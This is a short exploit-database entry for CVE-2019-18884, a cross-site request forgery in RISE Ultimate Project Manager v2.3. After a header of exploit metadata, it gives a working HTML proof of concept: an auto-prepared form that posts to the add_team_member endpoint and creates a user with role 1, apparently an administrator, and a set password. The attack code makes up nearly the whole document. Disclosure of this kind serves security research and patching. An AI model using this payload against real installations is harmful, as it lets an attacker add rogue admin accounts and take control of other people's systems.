RISE Ultimate Project Manager 2.3 Cross Site Request Forgery

                							

                # Exploit Title: RISE - Ultimate Project Manager v2.3 - Cross-Site Request Forgery (Add Admin)
# Date: 11-11-2019
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: http://fairsketch.com/
# Software Link : https://codecanyon.net/item/rise-ultimate-project-manager/15455641
# Software : RISE - Ultimate Project Manager
# Product Version:  Version 2.3
# Vulernability Type : Cross-Site Request Forgery
# Vulenrability : Cross-Site Request Forgery (Add Admin)
# CVE : CVE-2019-18884

# index.php/team_members/add_team_member in RISE Ultimate Project Manager v2.3 has CSRF for adding authorized users.

# CSRF PoC :

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://rise.fairsketch.com/index.php/team_members/add_team_member" method="POST">
      <input type="hidden" name="first_name" value="Ismail" />
      <input type="hidden" name="last_name" value="Tasdelen" />
      <input type="hidden" name="address" value="ismailtasdelen@protonmail.com" />
      <input type="hidden" name="phone" value="+12345678975" />
      <input type="hidden" name="gender" value="male" />
      <input type="hidden" name="job_title" value="Security Researcher" />
      <input type="hidden" name="salary" value="100000" />
      <input type="hidden" name="salary_term" value="12" />
      <input type="hidden" name="date_of_hire" value="2019-11-11" />
      <input type="hidden" name="email" value="ismailtasdelen@protonmail.com" />
      <input type="hidden" name="password" value="iQ.grF10" />
      <input type="hidden" name="role" value="1" />
      <input type="hidden" name="email_login_details" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
<p>